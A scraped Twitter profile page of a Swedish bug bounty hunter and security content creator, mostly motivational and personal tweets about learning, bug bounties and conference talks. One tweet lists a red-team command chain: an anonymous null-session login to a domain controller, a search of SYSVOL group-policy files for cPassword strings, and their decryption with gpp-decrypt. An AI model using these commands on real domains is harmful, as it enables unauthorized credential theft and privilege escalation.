STÖK ✌️ Profile Banner
STÖK ✌️ Profile
STÖK ✌️

@stokfredrik

126,694
Followers
1,144
Following
1,877
Media
20,577
Statuses

Hi.. im that hacker / creative that your friends told you about. Creative Director & Hacks all the things at @truesec

Sweden
Joined July 2017
Don't wanna be here? Send us removal request.
Pinned Tweet
@stokfredrik
STÖK ✌️
4 years
cat manifesto.txt HACKERS GONNA HACK CREATORS GONNA CREATE ——- - GOOD VIBES ONLY
136
225
2K
@stokfredrik
STÖK ✌️
7 months
Rip 🪦
271
113
1K
@stokfredrik
STÖK ✌️
4 years
I’m 42 and I still have no idea what I want to be when I grow up. I’m pretty sure I’ll figure it out one day, but for now im pretty satisfied with experimenting with winning at life (that’s my life). Good times..
Tweet media one
91
48
1K
@stokfredrik
STÖK ✌️
3 years
If you want to become a hacker / get into cyber in 2021 the only thing holding you back, is your own time and dedication. It’s never been easier with free resources just a few google dorks away. The knowledge, the tools & the trade is out there, but you, will have to do the work.
29
212
1K
@stokfredrik
STÖK ✌️
4 years
I’m not your mentor and I’m definitely not your guru. I don’t have all the answers, and I don’t have any secrets that you can’t find with just a few hours of googling. But I’m here to keep you inspired, and to motivate you to become the best version of yourself. Stay curious! ✌️
40
70
1K
@stokfredrik
STÖK ✌️
3 years
Cybersecurity is vast, there’s is always something new to learn!
25
124
937
@stokfredrik
STÖK ✌️
4 years
I get dms’s, mentions, emails very week where people say they left their job to do bounties but still haven’t found any / few bugs after up to 6 months. takeaway : Seriously, Don’t quit your day job before you know that you can make a living and consistently find bugs, if ever..
32
103
960
@stokfredrik
STÖK ✌️
4 years
Bug bounties is great as a hobby and for some even a career, but Its a high risk/high reward gig economy with a lot of competition. So play the game if you like, but I truly recommend that you have multiple streams of income and diverse your income flow to be sustained long term.
24
101
949
@stokfredrik
STÖK ✌️
5 years
From non-auth user to local admin in 3 steps (still to common) Nullsession: net use \\dc\ipc$ "" /u:"" Search for cpasswords in gpo's: dir \\dc\sysvol\contoso.corp\Policies -r -I *.xml | Select-String cPassword >> dump.txt Decrypt the cPassword gpp-decrypt <string> #redteam
12
288
947
@stokfredrik
STÖK ✌️
4 years
Whooohaaaaa! It my birthday, Hack all the things! Eat all the cakes!! 🎂🎂🎂
243
3
910
@stokfredrik
STÖK ✌️
3 years
Super exited to announce that I’m joining the awesome Cyber Security / Incident Response team at @Truesec as a Cyber Security Expert / Content creator in January! Exiting times ahead! Exiting indeed!
100
15
894
@stokfredrik
STÖK ✌️
3 years
DON'T BUY MY HOW TO GET STARTED IN BUG BOUNTY COURSE! - Do these 500+ FREE exercises instead! No I don't have a course, but massive shoutout to @PortSwigger @RealTryHackMe @CTFchallenge @Hacker0x01 @intigriti and more, for their awesome free stuff!
Tweet media one
24
209
855
@stokfredrik
STÖK ✌️
5 years
HOW TO GET STARTED IN BUG BOUNTY (9+pro tips) A week ago i asked the bounty community for their top 3 best tips on how to get started. This is the result. Thanks everyone who contributed and your awesome support! <3
Tweet media one
42
268
820
@stokfredrik
STÖK ✌️
4 years
Today is the first Monday in 17 years that I’m not in a corporate Monday morning meeting. After a lot of contemplation I decided I needed to close one chapter of my life to open up for a new one, so im now officially freelance Here’s to bounty life & content creation in 2020!
65
19
817
@stokfredrik
STÖK ✌️
5 years
Have you ever wondered what a $7.500 Bug Bounty bug looks like? In this vlog il walk you through a BLIND XXE OOB over DNS bug on a super hardened target and teach you how to exploit it. #bugbounty
34
259
804
@stokfredrik
STÖK ✌️
5 years
VIM tutorial: linux terminal tools for bug bounty pentest and redteams with @tomnomnom #bugbounty #hacking #recon #pentest #devlife #livingintheterminal
Tweet media one
35
233
698
@stokfredrik
STÖK ✌️
4 years
Felt a burnout coming on, needed a break. So went out to the archipelago outside my hometown Gothenburg, made vegan bbq burgers on a driftwood fire and caught some air and conversations with my non hacking friends. #mentalhealth
Tweet media one
Tweet media two
Tweet media three
Tweet media four
44
26
695
@stokfredrik
STÖK ✌️
4 years
I made a video for @Hacker0x01 where @TomNomNom teaches me and other js beginners to use the devtools to hunt for bugs in JavaScript. Check it out! #bugbounty #infosec
Tweet media one
@Hacker0x01
HackerOne
4 years
Proud to share some great #Hacker101 content! Check out JavaScript for Hackers. This exclusive video captures @stokfredrik learning how to use Chrome dev tools, read JavaScript, and look for vulnerabilities in the DOM with @TomNomNom . Great collaboration!
8
71
272
26
179
689
@stokfredrik
STÖK ✌️
4 years
I’m a noob. And I’ll always be a noob.. Because I thrive in the process of learning new things and to share my new knowledge with my friends. Always leveling myself and others up no matter if it’s Hacking tech, life or our minds.
Tweet media one
27
47
674
@stokfredrik
STÖK ✌️
2 years
Bought a domain, got a fresh droplet, opened port 80,443, added a simple flask app, monitored the logs, nothing super interesting. Then I ran certbot, got a letsencrypt cert & within seconds the automation / bots came running smashing wp/exchange exploit payloads. interesting..
Tweet media one
18
50
661
@stokfredrik
STÖK ✌️
3 years
Computers are cool, but having friends offline is important.
20
83
653
@stokfredrik
STÖK ✌️
3 years
HAPPY BIRTHDAY TO ME! 🎂
Tweet media one
150
6
655
@stokfredrik
STÖK ✌️
2 years
🐱💻👾
Tweet media one
47
14
654
@stokfredrik
STÖK ✌️
3 years
Bug Bounty is easy.. When you know what you are doing! Everything is hard before you know how to do it. Changing car tires, cooking food, writing code, singing / speaking in public, but the more you practice, well the easier it gets.. so keep practicing until it becomes easy.
21
109
629
@stokfredrik
STÖK ✌️
3 years
Don’t learn to hack.. Hack to learn…
15
99
629
@stokfredrik
STÖK ✌️
2 years
Linux is a gateway drug
26
60
601
@stokfredrik
STÖK ✌️
4 years
I could recommend new hunters to start with vdp’s & spend time on ctf’s. but tbh, I didn’t do that.. I also haven’t read the web application hackers handbook, but I did read petes book twice & didn’t understand shit. Do what works for you ok. But do it! Action is everything
29
85
600
@stokfredrik
STÖK ✌️
10 months
I used to have social phobia. A crippling fear of being judged/watched by others. Couldn’t go to the movies, eat or even be in big groups without massive panic attacks, anxiety & nausea. But worked on that & next week I’m presenting in the largest ballrooms at Blackhat/DEFCON 💪
Tweet media one
30
29
600
@stokfredrik
STÖK ✌️
4 years
Bug Bounty hunters & Pentesters alike, they all love to run their own domain and DNS Servers to log Out of Band interactions caused by RCEs, XXE's SSRFs and blind requests. And now you can do that too! Better safe than sorry! #bugbountytip #infosec #howto
Tweet media one
11
156
585
@stokfredrik
STÖK ✌️
4 years
This has to be said.. I LOVE INDIA! 🇮🇳
30
50
583
@stokfredrik
STÖK ✌️
4 years
Reminder: You become a hacker the second you decide your a hacker, it’s mindset... stay curious.
13
96
572
@stokfredrik
STÖK ✌️
3 years
Friendly Reminder: Words hurt. Emotions are real. The internet is harsh. Be nice to each other.
15
48
543
@stokfredrik
STÖK ✌️
2 years
Do you stop and celebrate milestones, or do you keep pushing towards what’s next?
Tweet media one
57
11
552
@stokfredrik
STÖK ✌️
5 years
🔥 Burp Suite tutorial: IDOR vulnerability automation using Autorize and AutoRepeater (bug bounty) with @Regala_ #bugbounty #pentest #cybersecurity by the community for the community!
Tweet media one
16
223
541
@stokfredrik
STÖK ✌️
4 years
Let’s get real. You will not find the secrets to succeed in bugbounties in a #bugbountytips tweet. I’m all about sharing, but one-liners and get rich fast copy/paste payloads will not be the road to long term success, most will turn out to be dupes, informative or n/a.
25
67
521
@stokfredrik
STÖK ✌️
5 years
@ShielderSec
Shielder
5 years
Exploiting Apache Solr through OpenCMS #exploit #XXE
1
97
211
4
181
520
@stokfredrik
STÖK ✌️
3 years
Shubh Diwali 🪔
51
11
508
@stokfredrik
STÖK ✌️
2 years
How to get started in bug bounty in 2022: • Use a browser and visit • type : How to get started in bug bounty • Spend a few months studying topics you find interesting (all you need to know is out there) • hack / reports bugs • relax • repeat
15
93
497
@stokfredrik
STÖK ✌️
2 years
Hey.. Are you cyber curious? Well, sweet, then i hope THIS is the year you break into cyber security. Coz we need you, more than ever!
18
54
498
@stokfredrik
STÖK ✌️
4 years
😴 Did you get your average of 8 hours of sleep / night this week? Sleep fuels the brain and is a huge performance enhancer. Better sleep = better hacks / better business / better life
30
31
496
@stokfredrik
STÖK ✌️
4 years
Bug Bounty changed my life. —- I sometimes forget how much in my life that actually has changed in the last 24 months. Growth game is strong!
15
19
493
@stokfredrik
STÖK ✌️
4 years
Imho Bug Bounties isn’t pentesting where you submit missing spf records, exposed server versions or software that has a cve registered. Always go for impact, if you can’t exploit it, don’t report it & try to understand what’s impactful for the company. Limit the noise, go deep!
25
70
497
@stokfredrik
STÖK ✌️
4 years
🟣 V I B E S
Tweet media one
23
12
490
@stokfredrik
STÖK ✌️
3 years
Cooking a spicy chana masala & puri.. Indian food is ek number.
50
18
482
@stokfredrik
STÖK ✌️
8 months
My @defcon talk on loginjections and malicious ANSI Escape sequences are now available at :
Tweet media one
20
116
485
@stokfredrik
STÖK ✌️
3 years
Hacking with firends irl = 👌
Tweet media one
25
25
481
@stokfredrik
STÖK ✌️
4 years
To late to start doing bugbounties? Imho hell no! Competition is increasing, tables are increasing, scopes.. increasing, plattforms are emerging. And things will change. So ride the wave, it’s a good one. In two years all of us will look back to this and say. Omfg What a ride!
18
53
480
@stokfredrik
STÖK ✌️
3 years
How do you deal with negative comments? I have to admit, the reason why I stopped creating content on youtube for a while was the result of negative comments. I have no issue with ppl question my technical abilities, calling me a fake or a noob, since that isn’t true, 1/3
158
20
478
@stokfredrik
STÖK ✌️
4 years
FUZZ ALL THE THINGS! In this episode of ”STÖK, time to learn something new” @Kuggofficial teach me the basics of AFL and we discover a 0day. Good times! #fuzzing #hacking #exploits #infosec #cyber
Tweet media one
4
106
480
@stokfredrik
STÖK ✌️
4 years
15 years with Sara today. That’s about 780 lazy Sunday’s Grateful for that. #bff
Tweet media one
30
4
477
@stokfredrik
STÖK ✌️
3 years
Hacking and findings vulns is cool and all, but being able to effectively communicate it, that’s the secret sauce.
16
56
472
@stokfredrik
STÖK ✌️
3 years
Tomorrow is my first day at @Truesec and Iv got those sparking butterflies I once had on the night before the first day of school. 😂
41
4
474
@stokfredrik
STÖK ✌️
3 years
In 2018 when I started doing bug bounties I had two decades of infrastructure, networking, sysadmin, and it pro consultant experience. But I didn’t know how to code. Now I do. Takeaway : Wanna do bounties? Learn how to code..
24
41
471
@stokfredrik
STÖK ✌️
4 years
HO HO HO! A Merry Xmas and a happy new bughunting year! - STÖK
29
23
470
@stokfredrik
STÖK ✌️
4 years
the video I recorded with @TomNomNom in a SF hotel room , weeks before the pandemic, just passed 100k views and has become the second most viewed video on h1’s YT. For a niche content creator that’s passionate about the community, this is huge, <3
Tweet media one
19
51
468
@stokfredrik
STÖK ✌️
9 months
Completed two lifetime bucket list achievements this week, 🪣 • Speak at Blackhat USA • Speak at DEF CON main track My presentation was 281 slides in 40 minutes, took 1,5 months to craft/ redefine and is the current result of over a years research into CWE-150 & ANSI ESC.
23
21
473
@stokfredrik
STÖK ✌️
4 years
Yes, I’m an absolutely a noob in appsec with only 2 years in bounties, but its worth to remember that Iv got 25+ years of experience as an it professional with years and year in system architecture and design. So my brain is trained to look for anomalies and solve problems.
17
21
453
@stokfredrik
STÖK ✌️
2 years
I’m so impressed by people that can study for hours, get good grades and collect cert after cert like it was magic cards. It’s just not me, never was, never will be, my mind just don’t work like that.
34
21
457
@stokfredrik
STÖK ✌️
3 years
Yes, I hack things. But i also live and advocated a sustainable lifestyle. Learning how to grow and cook your own food from scratch, and understanding how to do so without pesticides and chemical fertilizers, is imho just as important as understanding technology. #hackyourgarden
Tweet media one
Tweet media two
Tweet media three
Tweet media four
35
19
457
@stokfredrik
STÖK ✌️
11 months
Wow, i mean wow! I’m really excited and honored to be able to share my research around Unicode , ansi escape sequences and terminal command injections at Blackhat USA in August! @BlackHatEvents #bhusa
Tweet media one
28
38
456
@stokfredrik
STÖK ✌️
4 years
I love stickers, what’s on your box?
Tweet media one
75
17
438
@stokfredrik
STÖK ✌️
4 years
Wanna know something cool? If you strongly believe Bugbounties are unfair, flawed or just pure evil. You don’t have to participate. It’s all optional, it’s by choice. Some people play games, some do CTF’s, some knit, other like hack on really hardened targets. The choice is yours
30
36
436
@stokfredrik
STÖK ✌️
2 years
VIBEZSQUAD✌️ Forever grateful for the support and willingness to stick with me on this creative adventure. I personally would like to thank @Hacker0x01 , @intigriti @Bugcrowd , the BB community & everyone I met during LHE’s & ppl came that I had a change to create content with. /n
Tweet media one
42
19
445
@stokfredrik
STÖK ✌️
5 years
Squad Goals! We are DISTURBANCE #bugbounty #changingthegame
Tweet media one
Tweet media two
31
21
437
@stokfredrik
STÖK ✌️
3 years
DON'T BUY MY HOW TO GET STARTED IN BUG BOUNTY COURSE! - Do these 500+ FREE exercises #BugBountytip #cybersecurity
7
96
437
@stokfredrik
STÖK ✌️
3 years
In the last year iv: • Gained 10kg • Traveled 0 miles by a plane • Shrunken 2 cm in length • Switched career • Posted 50+ videos • Realized the importance of treated mental health issues • Spoken at 5+ virtual conferences • Learned to accept things that I can’t control
21
4
435
@stokfredrik
STÖK ✌️
16 days
Bug Bounty changed my life. If it wasn’t for the work by @Hacker0x01 , @Bugcrowd and all the people before them, I wouldn’t be able to have a hobby that pays for a lifestyle based around creativity, hacking and freedom. People that hate on BB just don’t get it. It’s life changing.
15
26
444
@stokfredrik
STÖK ✌️
4 years
Don’t know who needs to hear this but the right time for you to start hacking on live hardened Bounty targets.. is now..
18
52
423
@stokfredrik
STÖK ✌️
3 years
I don’t really have any plans for 2021, other than learning a shitload of new stuff, create and level up my content game, share cool things i stumble upon, hack things, secure things and hug as many ppl as I can as soon as it’s safe.
15
18
434
@stokfredrik
STÖK ✌️
2 years
Pop quiz : What tools output are these?
Tweet media one
67
29
435
@stokfredrik
STÖK ✌️
1 year
Are ppl still hyped about web3, virtual crypto islands & nfts? I still can’t see the value of any of it & you better believe I tried. Feels like as soon image ai entered the scene it all went meh. Owning a small piece of land & growing your own food, now that’s tru value to me.
Tweet media one
33
14
430
@stokfredrik
STÖK ✌️
4 months
Living my life for me was the best decision I ever made. What sucks is that it took me 40+ years to figure that out :) So if your you are in your 20-30s, don’t be me, life your life the way you feel fit, follow your own path and not the way you think is expected from you. YOLO
20
35
436
@stokfredrik
STÖK ✌️
4 years
Hey.. guess what?.. You worry to much.. We all do, and it’s ok., But things will sort itself out. If you let it.. #goodvibesonly
13
44
432
@stokfredrik
STÖK ✌️
3 years
It’s easy to get overwhelmed when you watch others work, may it be art, music, creative, content, hacking, research, write ups, bounties, work life. Just remember, it’s not a competition, there is enough room and abundance for all of us to succeed, if we want to and work for it.
12
68
431
@stokfredrik
STÖK ✌️
3 years
Got myself a nice solid IP ban.. On the home network... Again.. My family loves me.. ¯\_(ツ)_/¯
24
7
422
@stokfredrik
STÖK ✌️
5 years
So, i just signed up for the OSWE training since I realized I needed to level up my code review game. Course starts in December! Yaaay! Never stop learning. @offsectraining
32
33
412
@stokfredrik
STÖK ✌️
3 years
Bugbounty is a marathon, not a sprint & if you approach it with a pentest mindset, both in kind of bugs reported & exploitation, you might set yourself up for failure. Bounties is about showing maximum impact, without crossing the line (putting the customers clients at risk)🧵
19
78
418
@stokfredrik
STÖK ✌️
3 years
Dude,.. my house needs a haircut.. 💇‍♀️
Tweet media one
26
0
414
@stokfredrik
STÖK ✌️
5 years
Invest in yourself, never stop learning. If you could invest only one hour every week to study webapp security & bug hunting, imagine where you would be in a year. Then imagine where you would be if you put 20 hours in.. #levelup #bugbounty #cybersecurity
11
93
414
@stokfredrik
STÖK ✌️
4 years
I had the honor to close the @bsidesahmedabad conference with a inspirational talk about investing in yourself, practice makes perfect and how to turn your dupes into crits. #bugbounty #infosec #cybersecurity
Tweet media one
19
33
412
@stokfredrik
STÖK ✌️
4 years
Approaching a new bounty target? Wanna get that loot but not sure where to start? Don't worry, a while back I asked @Jhaddix about it! #Bugbounty #pentesting #webapp #appsec #cybersecurity
Tweet media one
10
108
408
@stokfredrik
STÖK ✌️
4 years
Life hack for happiness: “It’s always better to be kind than right. “ Try it..
25
66
401
@stokfredrik
STÖK ✌️
3 years
When social media is down. Deeply cherish that moment, as a gift to experience the real world, instead of doom refreshing like the addict you are..
18
52
403
@stokfredrik
STÖK ✌️
3 months
I hate to disappoint people. But sometimes I see a text message , email, dm, you name it and at that exact time get overwhelmed for no reason and then just forget about it, If I seem like a diva that don’t answer when you reach out I’m sorry, I don’t do it with intention.
Tweet media one
28
26
410
@stokfredrik
STÖK ✌️
5 years
I get loads of DM's on how i got started and how to get into bountys. So im going to make a vlog about it.. Question: What's your best 3 tips for the next gen of bounty hunters and ppl just starting and wanting to start bug hunting? #bugbounty
41
104
403
@stokfredrik
STÖK ✌️
2 years
why some security designs look great on paper..
21
42
397
@stokfredrik
STÖK ✌️
3 years
If you have the option, choose kindness. It always pays off on the long run.
11
34
400
@stokfredrik
STÖK ✌️
4 years
Most people I know that seriously slays in hacking / entrepreneurship / creative work. Have adhd or some other non neurolotypical disorder & has at some time in their life struggled with mental health issues. Y’all frikkin rock! Y’all heroes in my book! Thanks for being you! 🔥
13
42
393
@stokfredrik
STÖK ✌️
3 years
🌲This xmas, may all your reports be filled with P1’s, Crits and Exceptional’s and your hearts filled with joy. Stay curious my friends. 🎁
Tweet media one
18
13
391
@stokfredrik
STÖK ✌️
4 years
MY FIRST DAY AS FREELANCE (yes i did quit my day job to do content creation and bug bounties full time) #youtubestudio #ContentCreator #BugBounty
Tweet media one
25
14
388
@stokfredrik
STÖK ✌️
3 years
Cable management 😂 Naaah this is a creative workspace, things needs to be moved around.. I’m curious, what does your hackspace look like, Share a picture and let’s inspire each other! 👇
Tweet media one
52
14
391
@stokfredrik
STÖK ✌️
4 years
Today I’m doubting myself and my abilities and that’s ok. Life works that way, there are cloudy rainy days and there are days filled with sunshine. The most important thing Iv learned over the years is to simply accept that and don’t dwell on it.. tomorrow’s a new day 👊✌️
23
37
382
@stokfredrik
STÖK ✌️
4 years
YES! Back at the creative workspace after a months break! Inspiration lvl ⬆️ #create #grow
Tweet media one
17
4
379
@stokfredrik
STÖK ✌️
4 years
The ”JavaScript for hackers” video i recorded with @TomNomNom in a San Francisco hotel room, while dealing with the after maths of a massive migrane attack, just passed 500.000 views over at the @Hacker0x01 YT channel.. truly Amazing. Thanks for watching
Tweet media one
16
31
380
@stokfredrik
STÖK ✌️
3 years
If you use the same methodology, framework, automation, worldlists and the use same payloads as everyone else, you will miss out on all the fun. Be inspired, but be creative enough to look beyond what everyone else is doing. And crate your own path.
12
59
376
@stokfredrik
STÖK ✌️
3 years
10 GREAT habits for bug bounty hunters (and a productive life) #bugbountytip #infosec #appsec #CyberSecurity #motivational
Tweet media one
13
72
374
@stokfredrik
STÖK ✌️
2 years
I was bullied as a kid. I didn’t fit into the norm. I liked music the other kinds didn’t like. I skateboarded & loved computers. I had glasses and weird hair. I obsessed about things. I was shy.
32
5
374
@stokfredrik
STÖK ✌️
3 years
in 2018 I bought @yaworsk book Web hacking 101, read it twice, didn’t understand sh*t.. Iv now revisited it over the last weekends & realize I actually fully understand it. It’s quite amazing what 2 years of almost daily practice, BB and googling stuff will do to your skillset.
16
11
371
@stokfredrik
STÖK ✌️
4 years
I just love hacking.. The thrill of black box app testing for me is trying to figure out the pieces, sorting the puzzle, understanding the logic, the design, the purpose, and then.. force it do thing is wasn’t supposed to.. love it! #h1415 #bugbounty #CyberSecurity
8
31
354